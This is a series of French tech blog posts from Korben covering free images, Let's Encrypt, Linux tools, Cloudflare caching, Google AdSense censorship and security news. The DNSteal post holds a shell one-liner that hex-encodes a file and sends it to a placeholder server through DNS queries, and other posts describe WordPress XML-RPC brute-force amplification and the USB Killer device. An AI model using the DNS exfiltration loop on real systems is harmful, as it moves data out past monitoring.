Korben

Si vous aimez les trucs vintage, vous allez être ravis puisque la British Library est en train de libérer plus d'un million d'images extraites de livres du 17e, 18e et 19e siècle. http://korben.info/wp-content/uploads/2015/10/lick-650x334.png Pas de copyright donc pour ces illustrations que vous pourrez réutiliser dans toutes vos créations ou pour illustrer vos sites. Les illustrations sont rangées dans des collections arrangées par des bénévoles comme "couvertures de libres", "cyclisme", "espace", "bateaux", "illustration de livres pour enfants"...etc. http://korben.info/wp-content/uploads/2015/10/us-650x368.png Vous pouvez découvrir ces images ici. Cet article merveilleux et sans aucun égal intitulé : The British Library met en ligne plus d’un million d’images libres de droit ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Si vous voulez un certificat SSL pour votre serveur web, qui soit reconnu officiellement par la plupart des navigateurs, c'est possible et gratuitement avec Let's Encrypt. http://korben.info/wp-content/uploads/2015/10/lets.png Annoncé l'année dernière, ce service proposé par Mozilla, l'EFF, l'Internet Society, Cisco, Automatic...etc va permettre d'améliorer grandement la sécurité des sites web en permettant à tous de se créer un certificat reconnu par la société IdenTrust (autorité certifiante). Pour le moment, Let's Encrypt est en beta privée mais notez la date du 16 novembre dans votre calendrier, car à ce moment-là , chacun pourra générer son propre certificat. Cette initiative existe uniquement grâce au soutien de volontaires et aux dons faits par les gens et les sociétés qui pensent que cela est important. Si vous aussi, vous trouvez ça important, vous pouvez faire un don. Source Cet article merveilleux et sans aucun égal intitulé : Let’s Encrypt vous permettra dès le mois prochain, d’avoir un certificat SSL reconnu par tous les navigateurs ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Voici un proof of concept intéressant qui s'appelle DNSteal et qui permet de transférer des documents via le net, de manière très discrète en utilisant le protocole DNS. DNSteal est un script python qui fait office de faux serveur DNS et qui peut recevoir en entrée des fichiers. Une fois en place, il suffit par exemple de lancer la commande suivante pour transférer l'image send.png au faux serveur DNS. for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done C'est plutôt rigolo non ? http://korben.info/wp-content/uploads/2015/10/dnssteal-650x438.png DNSteal supporte aussi le transfert multi-fichiers et la compression de ceux-ci. Son développeur s'est fait plaisir Si vous voulez plus d'infos, c'est sur Github que ça se passe. Cet article merveilleux et sans aucun égal intitulé : Transférer des fichiers en utilisant des requêtes DNS ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Si vous bossez sur un ordinateur portable (Linux), vous avez dû remarquer que certaines applications vidaient assez rapidement la batterie. Pas cool mais bon, si vous pensez à les fermer à la main, dès que vous débranchez le câble d'alimentation, ça le fait. Si vous y pensez... Pour les autres, les têtes en l'air comme moi, il y a Powermonious, un script (en Go, donc il vous faudra installer Go) qui permet sur votre machine Linux, de stopper automatiquement certaines applications lorsque vous passez sur la batterie et de les relancer lorsque vous rebasculez sur un branchement secteur. Pour fonctionner, Powermonius a besoin de UPower, DBus et Bash et pour l'installer, il faut taper la commande suivante : go get -u github.com/joaomsa/powermonius Puis vous pouvez configurer les applications à stopper / relancer dans le fichier de conf : ~/.config/powermonius/resource.yaml Et lancez Powermonious avec la commande suivante : powermonious Et voilà ! Je pense que ça va bien vous aider au quotidien ! Cet article merveilleux et sans aucun égal intitulé : Powermonious – Un outil pour économiser la batterie de votre ordinateur portable ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Si vous utilisez WordPress pour votre site web, sachez qu'une nouvelle méthode d'attaque par bruteforce découverte au début du mois par la société Sucuri permet à un attaquant de tester de très nombreux identifiants et mots de passe avec une simple requête HTTP. Avec une attaque classique, 1 requête = 1 tentative de login. Mais avec cette attaque qui exploite une faiblesse dans XML-RPC, 1 requête = x tentatives de login. http://korben.info/wp-content/uploads/2015/10/wordpress-xmlrpc-brute-force-amplification.png Évidemment, comme vous ne verrez plus des tonnes de tentatives débouler dans vos logs, cette attaque est plus difficile à détecter. Comme XML-RPC permet de faire passer du XML via HTTP vers WordPress pour déclencher des actions (cron, api, manipulation de données...etc), il est très simple d'encapsuler non pas une mais un grand nombre de demandes de logins dans la même requête XML grâce à la méthode system.multicall. Ce nombre de demandes est limité uniquement par la mémoire accordée à PHP. Autant dire que plus votre PHP a de mémoire, plus l'attaquant va pouvoir tester en même temps des centaines, voire des milliers d'identifiants en même temps. Alors, comment se protéger ? Et bien si vous utilisez Cloudflare et que vous avez accès au WAF (Firewall applicatif présent dans la version payante de CF), pensez à activer les règles liées à WordPress.  http://korben.info/wp-content/uploads/2015/10/f1-650x380.png Cliquez sur le jeu de règles et bloquez la WP0018. http://korben.info/wp-content/uploads/2015/10/af2-650x101.png Autrement, il vous reste l'option "code" qui consiste à désactiver les appels à la méthode system.multicall en ajoutant ceci dans votre fichier functions.php, en attendant que WordPress publie un patch. function mmx_remove_xmlrpc_methods( $methods ) { unset( $methods['system.multicall'] ); return $methods; } add_filter( 'xmlrpc_methods', 'mmx_remove_xmlrpc_methods'); Ainsi vous serez protégé des scripts kiddies qui seraient tentés de s'en prendre à votre site. Pensez aussi à mettre un mot de passe un peu plus complexe qui sera difficile de casser avec un simple dictionnaire. Cet article merveilleux et sans aucun égal intitulé : WordPress – Comment vous protéger de cette nouvelle méthode d’attaque par bruteforce ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Le typosquatting est une technique qui consiste à ramasser un peu de trafic en profitant des erreurs des gens. Par exemple, pour venir me rendre visite, vous tapez Korben.info dans votre barre d'adresse. Mais il arrive parfois que certains se trompent et tapent lorben.info ou jorben.info car les touches "l" et "j" sont placées juste à côté de la touche "k". Et là , au lieu de tomber sur une erreur, vous arriverez peut-être sur une page web monétisée avec des trucs de merde qui vont rapporter un peu d'argent au typo-squatteur. Je ne sais pas s'il y a des mecs qui arrivent à gagner leur vie comme ça, mais si vous voulez savoir si votre nom de domaine se fait typosquatter, je vous propose d'installer DNSTwist. Il s'agit d'une application en ligne de commande qui va générer à partir de votre nom de domaine, des noms de domaines erronés et qui va ensuite vérifier s'ils sont typos squattés, c'est-à -dire s'il y a vraiment un serveur qui répond derrière. Pour que DNSTwist fonctionne, vous devez installer les bibliothèques python suivantes : sudo apt-get install build-essential libffi-dev python-dev python-pip automake autoconf libtool sudo BUILD_LIB=1 pip install ssdeep Puis récupérez le script ici sur Github. Enfin, entrez la commande suivante : ./dnstwist.py VOTREDOMAINE.COM Vous devriez alors voir sous vos yeux ébahis, tous les domaines typo squatté pour vous voler quelques visiteurs. Évidemment, plus votre nom de domaine est connu, plus il y aura de correspondances. Moi j'en ai que 7 pour le mien, mais par exemple, Youtube, c'est 101 domaines squattés.... http://korben.info/wp-content/uploads/2015/09/dnstwist-650x335.png Et malheureusement, il n'y a pas grand-chose à faire contre ces vautours, mis à part offrir des formations à vos visiteurs pour qu'ils apprennent à taper sur leur clavier Amusez-vous bien ! Cet article merveilleux et sans aucun égal intitulé : Un outil pour détecter le typo squatting ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Si vous pouviez changer de visage, vous iriez décoller celui de qui ? Non, arrêtez de vous prendre pour John Travolta / Nicolas Cage... Maintenant on peut prendre le contrôle du visage de n'importe qui sans pour autant le faire souffrir et avoir recours à de la chirurgie de pointe ! Comment ? Et bien grâce à cette nouvelle technique d'imagerie mise au point par des chercheurs de l'Université de Stanford, de l'Institut Max Planck et de l'Université de Erlangen-Nuremberg en Allemagne. Avec un PC tout ce qu'il y a de plus normal, et une caméra un peu spéciale capable de capturer en 3D les mouvements, la forme et la texture d'un visage, il devient possible de modifier en temps réel ses expressions. Voici ce que ça donne : Comme nous n'avons pas tous des bouches de la même taille, l'algorithme est capable de combler les vides avec de fausses dents http://korben.info/wp-content/uploads/2015/10/colorcorrected-81.jpeg Énorme non ? D'après Matthias Niessner, l'un des chercheurs, l'objectif est de pouvoir intercaler entre 2 personnes qui parlent 2 langues différentes, un traducteur (réel ou virtuel), pour ensuite donner l'impression que chacun parle dans la langue maternelle de l'autre. Ça peut aussi permettre de réaliser des effets spéciaux pour des spectacles en temps réel ou pour tout simplement se faire passer pour quelqu'un d'autre ;-) Source Cet article merveilleux et sans aucun égal intitulé : Une techno qui permet d’incarner quelqu’un d’autre ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Vous étiez plus de 4000 développeurs, lecteurs du blog, à avoir participé à la dernière édition de Coderpower IBM Bluemix. Certains d'entre vous s'étaient même taillés la part du lion en se plaçant en haut du classement des dév spécialistes du Javascript. Et bien la nouvelle saison de la compétition est lancée et j'en suis encore partenaire. Pour les nouveaux, Coderpower c'est une plateforme en ligne proposant des challenges articulés autour de différents langages de programmation et pas mal de développeurs de la communauté Korben.info y participent chaque année. Pour cette nouvelle saison, vous devrez construire, feature après feature, un moteur de recherche prédictif, nommé CECILE. Vous avez jusqu’au 28 octobre pour relever vos manches et vous lancer dans la compétition, à la clé, un titre de meilleur dev et 2200 dolls en cash. Sachez aussi, qu'à chaque étape de la compétition débloquée, vous pouvez remporter des prix, au menu: 1 iPhone 5c1 Apple Watch1 iPad air1 smartwatch Sony SWR50 31 Galaxy tab1 Galaxy S5 & 1 Micro SDOf course, chacune de ces étapes correspond à un niveau de difficulté différent, sinon ça ne serait pas rigolo. Pour participer à la compétition c'est par ici Et comme d'hab rendez moi fier padawans Cet article merveilleux et sans aucun égal intitulé : Coderpower nouvelle saison, la compétition des développeurs dédiée au javascript ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Je viens de tomber sur un article très intéressant où un journaliste se plaint de Google et plus particulièrement d'Adsense. Son problème est le suivant... En tant que journaliste, il se doit d'informer les gens et il expose pour cela des faits (écrits et photos) qui effectivement peuvent parfois être un peu "graphiques". C'est à dire des images un peu violentes qui sont pourtant nécessaires à l'Histoire et à l'information. Je pense par exemple à cette photo du petit garçon syrien mort sur une plage, aux crimes qui ont lieu partout dans le monde et qu'il faut dénoncer, et dans le cas de ce journaliste, à ces photos des tortures infligées par les militaires américains dans la prison d'Abu Graib (dans une vidéo YouTube qu'il monétise). http://korben.info/wp-content/uploads/2015/09/abu-ghraib-torture-04.jpg Ce journaliste informe sur son média et vit de son travail grâce à la publicité et donc grâce à Adsense. Seulement, voilà ... La censure Google est à l’œuvre en permanence, y compris sur ce genre de contenus et un beau jour, il reçoit un email qui lui dit en substance qu'il doit conformer son site et ses vidéos au règlement d'Adsense sous peine de voir son compte supprimé (et donc ses revenus s'envoler). J'ai déjà reçu ce genre d'alertes (et je vais vous en parler après), mais en gros, ça met à chaque fois un bon coup de stress, car on a 48h ou 72h pour rentrer dans les clous, et que l'exemple donné dans l'avertissement de Google (le lien incriminé) est juste un exemple et qu'il faut faire le ménage sur TOUT le site, mais Google ne vous dit pas où exactement. Gros bordel donc pour retrouver les contenus en question, qui si on se place dans la tête de Google, pourraient "violer" leurs "policies". Alors évidemment, on a le choix sur la méthode : Soit on retire la pub de tous ces articles qui ne rentrent pas dans les clous.Soit on s'autocensure pour être sûr de ne rien oublier qui pourrait conduire à une catastrophe économique.Sur un site proposant de l'information, s'autocensurer est hors de propos (en tout cas, je l'espère), surtout si comme ce journaliste, on parle en permanence de guerre et de violences. Mais retirer Adsense d'une partie du site, va entrainer une sacrée perte de monétisation. En ce qui me concerne, j'ai eu une expérience similaire avec Google Adsense... La première fois, j'ai eu une alerte pour pédophilie sur le site... Oui pédophilie... En effet, j'avais publié un article sur le fail de la Redoute où dans le catalogue, on voyait un mec à poil, au loin dans la mer... derrière des gosses pris en photo. J'avais mis la photo en question, plus une image de Pedobear et des mentions du mot "Pedobear". J'étais en vacances, et j'ai vu le message assez tard, et il me restait moins de 24h pour agir. J'ai donc décidé de m'autocensurer en enlevant la photo des gosses et en retirant les mots "pedobear" et l'image de l'ours pédophile. Et c'est passé. La seconde fois, c'était pour pornographie. Sur le forum, certains d'entre vous jouaient à "Devine quel est ce film" en publiant des captures-écrans de classiques du cinéma. Et effectivement, dans ce topic, il y avait une photo de l'actrice Miou Miou, seins nus. On voyait que son buste et ce n’était clairement pas porno. Qui en France n'a jamais vu les nichons de Miou Miou... ? Mais bon, pour Google c'est du porno et ça mérite censure. J'ai donc viré la photo et j'ai aussi viré la publicité Adsense sur le forum pour être peinard. Croyez-moi, l'autocensure n'est pas dans mes habitudes, mais là , ça ne portait pas à conséquence et je devais réagir vite. Avec le recul, je le regrette... Alors vous savez peut-être pourquoi Google casse les couilles là dessus ? Et bien parce qu'officiellement, les annonceurs ne souhaitent pas que leur image (leur pub) soit associée à des contenus pornos ou violents. Je peux comprendre ça même si dans le cas du journaliste cité plus haut, c'est problématique, car qu'est-ce qui, au final, différencie une photo un peu violente qui est là pour informer, d'une photo trash / gore ? En forçant les webmasters à faire le ménage de cette manière, Google n'est-il pas en train de lisser l'information, de lisser l'Histoire ? Puis ensuite, j'ai reçu ça : http://korben.info/wp-content/uploads/2015/09/google.png Comme vous pouvez le lire, cette fois Google ne souhaite plus protéger ses annonceurs... Non Google se protège lui-même et me suspend mon compte sans préavis, car j'ai expliqué sur cet article comment télécharger une vidéo YouTube. Et là , je n'ai pas eu 72h pour me retourner. Mon compte a été suspendu. Et pas question ici de retirer la publicité des articles incriminés. Non, non, ça ne servirait à rien. Google veut tout simplement que je supprime TOUS mes articles où j'explique comment jouer un peu avec leurs différents services, SINON Google me dit "Tu dégages !". Vous me connaissez, aborder ce genre de sujets qui déplaisent au géant américain, c'est un truc que je fais régulièrement et c'est surtout quelque chose dont j'aime bien parler. Supprimer tout ce contenu (qui doit se compter en plusieurs dizaines d'articles) m'aurait été insupportable, et ça aurait impliqué qu'ensuite, je m'autocensure en permanence pour éviter de déplaire à nouveau à Google. Imaginez l'enfer ! J'ai donc pris la lourde décision à l'époque, de supprimer de moi-même mon compte Adsense et de dire à Google d'aller se faire mettre bien profond. Ce ne fut pas simple, car Adsense m'apportait une grosse partie de mes revenus. J'avais plein de projets en cours, des développements, je m'apprêtais à payer quelques mecs pour faire des petits trucs de-ci de-là sur le site... Et paf, en 1h, tout ça c'était terminé. J'ai même du baisser ma rémunération de 30% pour ne pas planter ma boite. J'avais quand même bon espoir de redresser rapidement la barre en remplaçant Adsense par des petites régies alternatives, malheureusement, je n'ai jamais retrouvé, même de loin, le revenu que m'apportait Adsense. Mais vous savez quoi ? Ce n'est pas grave... Car maintenant, je n'ai plus aucun stress... Je peux partir en vacance peinard sans risquer de recevoir un de ces mails qui me dit : "T'AS 72H SINON..." ce qui avait le don de me gâcher ma journée et j'ai supprimé le placard de pub qui se trouvait à l'intérieur des articles. Sachez aussi que si vous voyez des publicités en provenance de Google dans mes pages, celles-ci ne proviennent pas de mon compte Adsense personnel (que j'ai fermé) mais de ma régie, qui fait sa tambouille. Et eux, bizarrement, ils n'ont jamais eu d'emmerdes à cause de moi, probablement parce qu'ils sont à un niveau supérieur dans les petits papiers de Google... Si je n'en ai pas parlé à l'époque, mis à part rapidement dans un édito, c'est par manque de temps et d'envie. Mais cet article sur lequel je suis tombé tout à l'heure a ravivé ces quelques souvenirs et je me suis dit que ce serait cool de partager ça avec vous. Donc à la question, Google est-il un putain de mormon coincé du cul, la réponse est OUI.À la question, Google fait-il pression (financièrement) sur les petits éditeurs pour censurer du contenu qui ne lui plait pas, la réponse est OUI.À la question, jusqu'où s'arrêtera Google dans sa censure, la réponse est "J'en sais rien", mais il est tout à fait plausible qu'un jour ils étendent cette censure à leur moteur de recherche. Si vous parlez d'un downloader YouTube sur votre site, paf, vous n'apparaitrez plus dans les résultats de recherche et vous pourrez dire bye bye à votre référencement naturel.À la question, les webmasters qui ont encore de l'Adsense sur leur site s'autocensurent-ils, la réponse est probablement oui, sauf s'ils traitent uniquement de sujets un peu plats.Voilà donc pour mon expérience d'Adsense. Je n'ai eu aucun souci avec eu durant des années et c'est depuis 2013 qu'ils ont commencé à se prendre au sérieux et à mettre la pression sur moi (et j'imagine sur d'autres). À bon entendeur, salut ! Cet article merveilleux et sans aucun égal intitulé : Quand Google met la pression sur les petits éditeurs de contenu ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Je ne sais pas quand vous avez mis les "pieds" pour la première fois sur Internet mais moi c'était en 97 et mes moteurs de recherche préférés étaient Altavista.com et Astalavista.box.sk :-) Puis Google est arrivé... N'empêche à l'époque Altavista c'était le top du top. D'ailleurs savez vous sur quoi ça tournait ? Et bien vous allez être surpris car Alice Maz de chez Wired a mis la main sur ce mail de 1996 qui décrit la config des différents serveurs nécessaires au fonctionnement du moteur de recherche. http://korben.info/wp-content/uploads/2015/10/wpid-wp-1445175527892.jpg Amusant non ? L'indexeur était quand même une sacrée bête de course pour l'époque. Et vous, votre site Web, il tournait sur quoi en 96 ? Cet article merveilleux et sans aucun égal intitulé : Altavista en 1996, c’était ça… ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Si vous êtes sous Linux et que vous voulez être absolument certain que l'intégralité de votre trafic passe par le réseau Tor, voici Nipe, un script Perl imaginé par Heitor Gouvea. Nipe installe Tor, déploie une config et crée les règles iptables nécessaires. Ainsi vous serez absolument certain que l'intégralité du trafic entrant et sortant de votre machine transitera via Tor. Pratique si vous n'êtes pas à l'aise avec Iptables. Autrement, vous pouvez aussi jeter un oeil au contenu du script pour voir exactement quelles sont les bonnes règles. Source Cet article merveilleux et sans aucun égal intitulé : Faites passer tout votre trafic via Tor avec ce script ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Mountain View, Californie, 9h du matin. Bart se lève, les pas vacillants, les yeux englués par un manque évident de sommeil. Encore une journée pourrie à passer dans cet incubateur de merde, encore une journée à trainer sa carcasse dans la silicon valley, à croiser des vieux beaufs aux poches pleines alors que les siennes sont encore vides. Pourtant, Harrison, le pseudo président de cet incubateur, accessoirement créé dans sa maison perso, lui avait vendu du rêve...Un soutien matériel et humain pour développer son app, une présentation aux big boss de la valley et une levée de fond dans les deux semaines après son arrivée...ça faisait deux mois qu'il était là et toujours rien, nada, walou, peau de zob. -"T'es un champion" se répète-t-il devant la glace, en s'éfforçant d'y croire. http://korben.info/wp-content/uploads/2015/10/bug-01.jpg Alors que la faim lui attrappe le bide, il se dirige vers la cuisine commune. -"shit, y a plus de thé" grogne-t-il en ouvrant le placard. -"Raj, c'est toi qui a tout bu ?" dit il en se retournant vers le seul mec assis à la table. Raj, surnommé Bombay Man par ses collègues, était arrivé il y a trois semaines pour re-développer l'architecture cloud de l'app. -"Pourquoi tu me demandes ça ? c'est parce que je suis d'origine indienne ? Pourquoi tu ne demandes pas à Nick" -"euh..." s'étonne Bart -"Comme dans les légendes de ton peuple, les indiens sont fan de thé, tu te dis, oh b'hein c'est le petit Raj qui a tout sifflé ce matin...c'est raciste mec" http://korben.info/wp-content/uploads/2015/10/bug-02.jpg -"...?..." Bart, toujours plus ébahi. -"Je vais te dire un truc, le meilleur thé est produit au Sri Lanka, j'ai étudié au MIT et je suis né à Orlando, Floride...connard" irrité, il se lève et quitte la cuisine, non sans serrer bien fort dans sa main le dernier sachet de Barrys, un thé made in Ireland. -"café" fini par se dire Bart. ***-"Holy fuck !" s'écria Harrison depuis le salon.http://korben.info/wp-content/uploads/2015/10/bug-03.jpg Bart se précipita dans la pièce. Harrison, installé devant son ordi n'arrêtait pas de taper frénétiquement sur son clavier. -"Mais qu'est-ce que tu fais ?" lui demande Bart. -"C'est la guerre dude ! je viens de me faire attaquer par les chinois, mon ordi vient de freezer juste au moment où cette talentueuse Dina Mordlamoi allez..." s'emporte Harrisson, l'haleine aromatisée d'une weed fraîchement fumée. Bart se penche sur l'ordi. -"Putain, mais tu mattes un porno à 9h du mat" dit Bart. -"C'est pas beau de juger..." répond Harrison. -"...ouais, raciste" reprend de volée Raj, assis au bureau. -"Wow wow, c'est quoi ce bordel, impossible de dormir ici" s'exclame Nick en entrant dans le salon. Nick, heavy metal addict, black hat reconverti et interdit de sortie du territoire US, était le responsable sécurité réseau de l'équipe. Si un RAT essayait d'entrée, c'était lui dératiseur. -"Holy shit ! mais qu'est-ce que t'as fait ?" s'écria Harrison en le voyant débouler. Nick, torse nu, laissait apparaitre deux percings fraichement posés aux tétons. -"Oh ça, c'est un cadeau pour Carla, on est sorti hier, c'etait pour lui prouver mon amour" répond Nick. -"Tu pouvais pas te faire tatouer son prénom comme tout le monde..." demande Harrisson. -"...ou une vache" continua Raj, le regard posé sur Bart. -"Mec t'es tellement rouge, tu vas creuver sur place" l'avertit Harrison -"ouais, c'est un peu infecté c'est vrai, mais comme elle etait contente, ça m'assure encore quelques soirées à ne pas être obligé de jouer à Hand Solo (Nick agitant sa main)...comme vous. Bon pourquoi tu miaules ?" demande-t-il à Harrisson. -"Virus" repond Raj. -"T'as pas d'anti-virus" lui demande Bart -"Pas besoin, je suis sur MAC" repond Harrison -"Légende urbaine mon pote...bon tiens j'ai un contact qui m'a passé des licences ESET. On va te virer cette merde et je vais t'installer la V9" dit Nick en attrapant l'ordi d'Harrison. Nick s'assied et commence à bidouiller le MAC. Sentant que les trois gus autour de lui le dévisagent, il marque une pause. . -"Quoi ?" s'interroge-t-il -"Mec faut vraiment que t'ailles à l'hosto" lui dit Harrisson Nick regarde sa poitrine, des gouttes de sangs perlent sur le clavier, il s'évanouit... -"Raj ! chope le téléphone !" s'écria Bart Raj, le téléphone déjà en main. -"Taxi ou Uber ?" *Illustrations par Alex.Disclaimer: Toutes ressemblances avec les personnages d'une série en cours de production est entièrement volontaire. Sinon, si vous ne voulez pas attendre que Nick se réveille pour vous passer les clés d'activation de la V9 d'ESET, vous pouvez jouer au Kontest juste en dessous, en jeu 30 licences ESET Multi-Device Security: Cet article merveilleux et sans aucun égal intitulé : Gagnez 30 licences ESET Security V9 seulement si Nick arrive à temps à l’hosto ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Alors aujourd'hui on va s'amuser ! Si vous cherchez un moyen de faire une bonne blague à un ami ou de partager rapidement avec vos collègues des pages web qui vous plaisent, voici Shove, une extension Chrome qui permet de faire ça en un clic. Tout le monde l'installe, vous ajoutez vos amis et paf, en un clic, vous pouvez balancer n'importe quelle page web sur l'écran de votre ami. Pas de message, pas d'avertissement... rien du tout ! Juste la page web qui débarque comme ça sans prévenir ! http://korben.info/wp-content/uploads/2015/10/shove.png C'est magique ! Mais gaffe à qui vous acceptez dans votre liste de contacts, car les petits farceurs sont légion et le porno-surprise est partout le net ;-) Cet article merveilleux et sans aucun égal intitulé : Le moyen le plus rapide de partager des pages web avec vos amis ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Connaissez-vous la dernière lubie du Joint Photographic Expert Group, le groupe d'expert qui supervise le format JPEG ? (ahaha oui, JPEG ça veut dire ça !) Et bien ils aimeraient ajouter le support des DRM dans notre format d'image préféré... Comme pour les vidéos, cela permettrait de verrouiller certaines images pour éviter par exemple que vous ne les voyiez si vous n'avez pas payé... Ou pour tout simplement bloquer leur transfert, leur utilisation ou leur modification si le copyright (marqué dans le DRM) ne vous y autorise pas. Quelle idée de merde ! Évidemment, l'EFF monte au créneau et explique dans ce PDF pourquoi c'est une mauvaise idée. Je vous fait un résumé... 1/ Les DRM sont inefficaces et totalement contournables2/ Les DRM ne permettent pas de tenir compte de pratiques comme le fair use (utilisation dans le cadre personnel par exemple)3/ Les DRM peuvent conduire à un découpage par région du monde (comme pour les zones DVD) ce qui génère une inégalité concurrentielle4/ Des tas d'images dans le domaine public vont se retrouver illégitimement marquées par ce DRM5/ On ne pourra plus lire ces images protégées sur des systèmes d'exploitation qui ne le supportent pas (Linux au hasard)6/ De plus, cela va poser tout un tas de nouveaux risques lié à la sécurité (nouveau plugin ou logiciel fermé...donc nouvelles vulnérabilités)...etc etcAutant dire que ce n’est pas la meilleure idée qu'ils aient eu. En compensation, l'EFF recommande de remplacer ça par un marquage (possiblement inamovible) des images via les meta données et un aménagement des licences. Pour le moment, les gens du JPEG n'ont pas encore pris leur décision, mais espérons qu'ils ne se trompent pas de chemin. Imaginez à quoi ressemblerait mon site, si toutes les images, y compris celles appelées par la CSS, étaient sous DRM et que vous n'avez pas la clé ? Et bien ça ressemblerait à ça : http://korben.info/wp-content/uploads/2015/10/capture-de--cran-2015-10-14-07.45.241-650x500.png Source Cet article merveilleux et sans aucun égal intitulé : Prochainement, des DRM dans les JPEG ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Généralement chasse gardée d'événements à 10 000 dolls le ticket, cette fois on vous propose de participer à une conférence en ligne sur l'IA et le machine learning sans vous ruinez, où vous pourrez en direct poser vos questions aux experts du domaine. Vous parlerez, algorithme génétique, Intelligence Artificielle appliquée, objets connectés et machine learning, entre autre. Si vous avez peur de vous perdre, aucun soucis, il suffit d'un peu de passion et de l'écoute des intervenants pour éclairer votre lanterne. Si vous aimez développer, si Minority Report est dans un coin de votre tête, si AI de Spielberg vous a fait vous interroger sur la science et ses applications, alors c'est le moment d'ouvrir vos esgourdes. Qui sait, peut être que vous bidouillez déjà dans votre coin, quelques lignes de codes griffonnées sur un tableau, des circuits imprimés sur le bureau et qu'il vous manque juste une étincelle. La conf démarrera le 17 octobre et durera toute la journée. Vous pouvez dès à présent checker les sujets qui vous intéresse le plus ici Pour info, sera présent Rand Hindi, fondateur de Snips et je vous invite fortement à écouter son TEDTalk: Et pour ceux qui sont passé à côté, ma modeste contribution de fan de SF bonne lecture Cet article merveilleux et sans aucun égal intitulé : La première conférence online sur l’IA et le machine learning est accessible ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Si vous n'avez pas encore mis de résine dans vos ports USB, voici une petite news qui devrait vous faire changer d'avis. On le sait tous, les ports USB sont des nids à microbes... On peut se choper un malware (souvenez-vous de Stuxnet) et cela même si l'ordinateur est en air gap (non connecté au réseau), ou si l'intrus utilise une clé genre Rubber Ducky, il peut tranquillement faire sa vie sur l'ordinateur de la victime sans laisser aucune trace. Puis en début d'année, on a vu apparaitre l'USB Killer, une clé capable de cramer les composants d'un ordinateur. C'était déjà impressionnant et voici que Dark Purple, son créateur nous propose l'USB Killer 2.0. http://korben.info/wp-content/uploads/2015/10/d356d546d74e445583988307e9854190-650x542.jpg Encore plus puissante et plus dévastatrice que la première version. En effet, là ou la V1.0 se contentait de charger dans un condo -110 V pour tout relâcher d'un coup dans la machine et recommencer encore et encore jusqu'à ce plus rien ne réponde, la version 2.0 d'USB Killer emmagasine -220 V qui sont relâchés d'un coup, ce qui grille à coup sûr l'ordinateur, le téléphone (s'il supporte l'OTG), la télévision ou de tout type d'appareil avec un port USB. Et comme pour la première version, si le port USB continue de fonctionner, le processus recommence jusqu'à ce que tout soit mort. En gros, avec cette clé diabolique, vous faites passer un ordinateur de vie à trépas en quelques secondes. Voici une démo en vidéo : FEAR !!!! Ça me rappelle la fois où je me suis trompé d'alim pour un Hub USB. En quelques secondes, j'ai fait cramer ma webcam, mon micro Yeti, mon lecteur graveur DVD externe...etc. Les boules ! Bon, par contre, l'histoire ne dit pas où s'en procurer une...En tout cas, je ne le répèterai jamais assez, faites gaffe avec vos ports USB. Cet article merveilleux et sans aucun égal intitulé : Comment tout détruire avec une clé USB ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Peu de gens le savent, mais par défaut Cloudflare met en cache uniquement les fichiers images, CSS et JavaScript. Ne comptez donc pas dessus pour mettre vos pages HTML en cache... Ça explique aussi pourquoi lorsque votre site est en carafe, vous voyez quelque chose comme ça : http://korben.info/wp-content/uploads/2015/10/capture-de--cran-2015-10-12-17.01.54-650x342.png Et pas votre site mis en cache. Alors que faire ? Et bien pour forcer la mise en cache des pages HTML présentes sur votre serveur, il faut créer ce qui s'appelle des "Page Rules". Comme vous pouvez le voir ci-dessous, j'ai donc forcé les URLs suivantes pour le html : *example.com/* *example.com/*.html http://korben.info/wp-content/uploads/2015/10/capture-de--cran-2015-10-12-17.01.13-650x325.png Et en Custom Caching, j'ai mis "Cache everything". http://korben.info/wp-content/uploads/2015/10/capture-de--cran-2015-10-12-17.10.55-650x277.png Et pour empêcher de mettre en cache la partie admin de WordPress, il faut ajouter ceci en précisant le contournement du cache (bypassing) *example.com/wp-admin* http://korben.info/wp-content/uploads/2015/10/capture-de--cran-2015-10-12-17.09.47-650x238.png Et voilà ! Vous verrez, la charge de votre serveur va grandement diminuer Cet article merveilleux et sans aucun égal intitulé : Comment forcer Cloudflare à mettre en cache vos pages HTML ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Si vous voulez en savoir plus sur ce qu'est un Bug Bounty, je vous invite à lire, à bookmarker et à partager cet article qui vous dira tout sur le Bug Bounty, avec à la fin, une annonce spéciale concernant le lancement de FireBounty, un nouveau service que je lance avec mes amis de Yes We Hack. Bonne lecture à tous ! Cet article merveilleux et sans aucun égal intitulé : Le business du Bug Bounty ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

